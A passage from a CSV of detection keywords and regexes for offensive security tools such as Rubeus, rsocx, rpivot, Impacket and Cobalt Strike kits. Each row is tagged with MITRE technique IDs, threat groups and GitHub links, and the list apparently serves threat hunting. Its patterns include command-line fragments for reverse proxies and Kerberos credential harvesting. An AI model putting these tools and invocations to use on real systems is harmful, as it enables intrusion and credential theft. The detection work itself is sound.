TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*rpcrelayclient.*",".{0,1000}rpcrelayclient\..{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*rpcrelayclient.py*",".{0,1000}rpcrelayclient\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","10","10","140","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" "*rpcrt4_new.dll*",".{0,1000}rpcrt4_new\.dll.{0,1000}","offensive_tool_keyword","POC","Remote Code Execution Exploit in the RPC Library CVE-2022-26809","T1190 - T1203 - T1068 - T1210","TA0001 - 
TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/websecnl/CVE-2022-26809","1","1","N/A","N/A","1","30","3","2022-04-19T17:04:04Z","2022-04-14T08:12:24Z" "*rpcrt4_old.dll",".{0,1000}rpcrt4_old\.dll","offensive_tool_keyword","POC","Remote Code Execution Exploit in the RPC Library CVE-2022-26809","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/websecnl/CVE-2022-26809","1","1","N/A","N/A","1","30","3","2022-04-19T17:04:04Z","2022-04-14T08:12:24Z" "*rpc-shellcode.go*",".{0,1000}rpc\-shellcode\.go.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*rpivot.zip*",".{0,1000}rpivot\.zip.{0,1000}","offensive_tool_keyword","rpivot","socks4 reverse proxy for penetration testing","T1090.004 - T1572 - T1021.001","TA0011 - TA0002 - TA0040","N/A","N/A","C2","https://github.com/klsecservices/rpivot","1","1","N/A","10","10","533","123","2018-07-12T09:53:13Z","2016-09-07T17:25:57Z" "*rpivot-master*",".{0,1000}rpivot\-master.{0,1000}","offensive_tool_keyword","rpivot","socks4 reverse proxy for penetration testing","T1090.004 - T1572 - T1021.001","TA0011 - TA0002 - TA0040","N/A","N/A","C2","https://github.com/klsecservices/rpivot","1","1","N/A","10","10","533","123","2018-07-12T09:53:13Z","2016-09-07T17:25:57Z" "*rpm.torproject.org/*public_gpg.key*",".{0,1000}rpm\.torproject\.org\/.{0,1000}public_gpg\.key.{0,1000}","offensive_tool_keyword","torproject","Browse Privately. Explore Freely. Defend yourself against tracking and surveillance. 
Circumvent censorship.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","N/A","Data Exfiltration","torproject.org","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*rsactftool --*",".{0,1000}rsactftool\s\-\-.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*rsactftool* --dumpkey --key *",".{0,1000}rsactftool.{0,1000}\s\-\-dumpkey\s\-\-key\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*rshijack*",".{0,1000}rshijack.{0,1000}","offensive_tool_keyword","rshijack","tcp connection hijacker. rust rewrite of shijack from 2001. This was written for TAMUctf 2018. brick house 100. The target was a telnet server that was protected by 2FA. Since the challenge wasn't authenticated. there have been multiple solutions for this. Our solution (cyclopropenylidene) was waiting until the authentication was done. 
then inject a tcp packet into the telnet connection:","T1195 - T1565.001 - T1565.002 - T1574 - T1573 - T1071.004","TA0011 - TA0001","N/A","N/A","Sniffing & Spoofing","https://github.com/kpcyrd/rshijack","1","0","N/A","N/A","5","433","41","2024-02-10T20:36:55Z","2018-02-23T02:21:45Z" "*rsmudge/ElevateKit*",".{0,1000}rsmudge\/ElevateKit.{0,1000}","offensive_tool_keyword","cobaltstrike","The Elevate Kit demonstrates how to use third-party privilege escalation attacks with Cobalt Strike's Beacon payload.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/ElevateKit","1","1","N/A","10","10","852","195","2020-06-22T21:12:24Z","2016-12-08T03:51:09Z" "*rsockstun -*",".{0,1000}rsockstun\s\-.{0,1000}","offensive_tool_keyword","rsockstun","reverse socks tunneler with ntlm and proxy support","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","N/A","C2","https://github.com/llkat/rsockstun","1","0","N/A","10","10","43","19","2022-08-09T09:25:50Z","2018-10-17T09:51:11Z" 
"*rsockstun-1.1.zip*",".{0,1000}rsockstun\-1\.1\.zip.{0,1000}","offensive_tool_keyword","rsockstun","reverse socks tunneler with ntlm and proxy support","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","N/A","C2","https://github.com/llkat/rsockstun","1","1","N/A","10","10","43","19","2022-08-09T09:25:50Z","2018-10-17T09:51:11Z" "*rsockstun-master*",".{0,1000}rsockstun\-master.{0,1000}","offensive_tool_keyword","rsockstun","reverse socks tunneler with ntlm and proxy support","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","N/A","C2","https://github.com/llkat/rsockstun","1","1","N/A","10","10","43","19","2022-08-09T09:25:50Z","2018-10-17T09:51:11Z" "*rsocx -l 0.0.0.0*",".{0,1000}rsocx\s\-l\s0\.0\.0\.0.{0,1000}","offensive_tool_keyword","rsocx","A bind/reverse Socks5 proxy server.","T1090.001 - T1090.002 - T1071.001","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/b23r0/rsocx","1","0","N/A","10","10","354","139","2022-09-28T08:11:34Z","2015-05-13T04:02:55Z" "*rsocx -r *:*",".{0,1000}rsocx\s\-r\s.{0,1000}\:.{0,1000}","offensive_tool_keyword","rsocx","A bind/reverse Socks5 proxy server.","T1090.001 - T1090.002 - T1071.001","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/b23r0/rsocx","1","0","N/A","10","10","354","139","2022-09-28T08:11:34Z","2015-05-13T04:02:55Z" "*rsocx -t 0.0.0.0*",".{0,1000}rsocx\s\-t\s0\.0\.0\.0.{0,1000}","offensive_tool_keyword","rsocx","A bind/reverse Socks5 proxy server.","T1090.001 - T1090.002 - T1071.001","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/b23r0/rsocx","1","0","N/A","10","10","354","139","2022-09-28T08:11:34Z","2015-05-13T04:02:55Z" "*rsocx.exe* 0.0.0.0*",".{0,1000}rsocx\.exe.{0,1000}\s0\.0\.0\.0.{0,1000}","offensive_tool_keyword","rsocx","A bind/reverse Socks5 proxy server.","T1090.001 - T1090.002 - T1071.001","TA0011 - TA0009 - 
TA0040","N/A","N/A","C2","https://github.com/b23r0/rsocx","1","0","N/A","10","10","354","139","2022-09-28T08:11:34Z","2015-05-13T04:02:55Z" "*rsocx.exe* 127.0.0.1*",".{0,1000}rsocx\.exe.{0,1000}\s127\.0\.0\.1.{0,1000}","offensive_tool_keyword","rsocx","A bind/reverse Socks5 proxy server.","T1090.001 - T1090.002 - T1071.001","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/b23r0/rsocx","1","0","N/A","10","10","354","139","2022-09-28T08:11:34Z","2015-05-13T04:02:55Z" "*rsocx-main.zip*",".{0,1000}rsocx\-main\.zip.{0,1000}","offensive_tool_keyword","rsocx","A bind/reverse Socks5 proxy server.","T1090.001 - T1090.002 - T1071.001","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/b23r0/rsocx","1","1","N/A","10","10","354","139","2022-09-28T08:11:34Z","2015-05-13T04:02:55Z" "*rtcrowley/Offensive-Netsh-Helper*",".{0,1000}rtcrowley\/Offensive\-Netsh\-Helper.{0,1000}","offensive_tool_keyword","Offensive-Netsh-Helper","Maintain Windows Persistence with an evil Netshell Helper DLL","T1174 - T1055.011 - T1546.013 - T1574.002 - T1105","TA0003 ","N/A","N/A","Persistence","https://github.com/rtcrowley/Offensive-Netsh-Helper","1","1","N/A","9","1","12","5","2018-07-28T02:12:09Z","2018-07-25T22:49:20Z" "*RtlDallas/Jomungand*",".{0,1000}RtlDallas\/Jomungand.{0,1000}","offensive_tool_keyword","Jomungand","Shellcode Loader with memory evasion","T1055.012 - T1027.002 - T1564.006","TA0005 - TA0042","N/A","N/A","Defense Evasion","https://github.com/RtlDallas/Jomungand","1","1","N/A","10","3","244","41","2023-10-22T12:33:50Z","2023-10-22T12:28:45Z" "*RtlDallas/KrakenMask*",".{0,1000}RtlDallas\/KrakenMask.{0,1000}","offensive_tool_keyword","KrakenMask","A sleep obfuscation tool is used to encrypt the content of the .text section with RC4 (using SystemFunction032). 
To achieve this encryption a ROP chain is employed with QueueUserAPC and NtContinue.","T1027 - T1027.002 - T1055 - T1055.011 - T1059 - T1059.003","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/RtlDallas/KrakenMask","1","1","N/A","9","3","217","37","2023-11-29T21:58:34Z","2023-08-05T19:24:36Z" "*RU5EVEhJU0ZJTEVUUkFOU01JU1NJT05FR1JFU1NBU1NFU1M=*",".{0,1000}RU5EVEhJU0ZJTEVUUkFOU01JU1NJT05FR1JFU1NBU1NFU1M\=.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","587","136","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*rubber_ducky.py*",".{0,1000}rubber_ducky\.py.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*Rubeus createnetonly *",".{0,1000}Rubeus\screatenetonly\s.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Amnesiac","1","0","N/A","10","3","265","46","2024-04-18T15:39:34Z","2023-10-31T15:06:25Z" "*Rubeus*currentluid*",".{0,1000}Rubeus.{0,1000}currentluid.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","10","10","3823","749","2024-04-26T11:33:01Z","2018-09-23T23:59:03Z" "*Rubeus*harvest*",".{0,1000}Rubeus.{0,1000}harvest.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. 
It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","10","10","3823","749","2024-04-26T11:33:01Z","2018-09-23T23:59:03Z" "*Rubeus*logonsession*",".{0,1000}Rubeus.{0,1000}logonsession.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","10","10","3823","749","2024-04-26T11:33:01Z","2018-09-23T23:59:03Z" "*Rubeus*monitor*",".{0,1000}Rubeus.{0,1000}monitor.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). 
Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","10","10","3823","749","2024-04-26T11:33:01Z","2018-09-23T23:59:03Z" "*Rubeus.bin*",".{0,1000}Rubeus\.bin.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","10","10","1490","261","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z" "*Rubeus.Commands*",".{0,1000}Rubeus\.Commands.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). 
Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","1","N/A","10","10","3823","749","2024-04-26T11:33:01Z","2018-09-23T23:59:03Z" "*Rubeus.exe *",".{0,1000}Rubeus\.exe\s.{0,1000}","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","N/A","Exploitation tools","https://github.com/reveng007/Executable_Files","1","0","N/A","10","1","8","2","2024-04-29T01:58:07Z","2021-12-10T15:04:35Z" "*Rubeus.exe*",".{0,1000}Rubeus\.exe.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","1","N/A","10","10","3823","749","2024-04-26T11:33:01Z","2018-09-23T23:59:03Z" "*Rubeus.exe*",".{0,1000}Rubeus\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*Rubeus.git*",".{0,1000}Rubeus\.git.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","1","N/A","10","10","3823","749","2024-04-26T11:33:01Z","2018-09-23T23:59:03Z" "*Rubeus.Kerberos*",".{0,1000}Rubeus\.Kerberos.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). 
Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","1","N/A","10","10","3823","749","2024-04-26T11:33:01Z","2018-09-23T23:59:03Z" "*Rubeus.lib*",".{0,1000}Rubeus\.lib.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","1","N/A","10","10","3823","749","2024-04-26T11:33:01Z","2018-09-23T23:59:03Z" "*rubeus.txt*",".{0,1000}rubeus\.txt.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*RubeusAskTgtMenu*",".{0,1000}RubeusAskTgtMenu.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*RubeusASREPRoastManager*",".{0,1000}RubeusASREPRoastManager.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed 
in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*RubeusChangePwManager*",".{0,1000}RubeusChangePwManager.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*RubeusCreateNetOnlyManager*",".{0,1000}RubeusCreateNetOnlyManager.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*RubeusDescribeManager*",".{0,1000}RubeusDescribeManager.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*RubeusDumpManager*",".{0,1000}RubeusDumpManager.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - 
TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*RubeusDumpMenu*",".{0,1000}RubeusDumpMenu.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*RubeusHarvestManager*",".{0,1000}RubeusHarvestManager.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*RubeusHarvestMenu*",".{0,1000}RubeusHarvestMenu.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*RubeusHashManager*",".{0,1000}RubeusHashManager.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*RubeusKerberoastManager*",".{0,1000}RubeusKerberoastManager.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its 
agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*RubeusKerberoastMenu*",".{0,1000}RubeusKerberoastMenu.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*RubeusKlistManager*",".{0,1000}RubeusKlistManager.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*RubeusManager*",".{0,1000}RubeusManager.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*Rubeus-master*",".{0,1000}Rubeus\-master.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). 
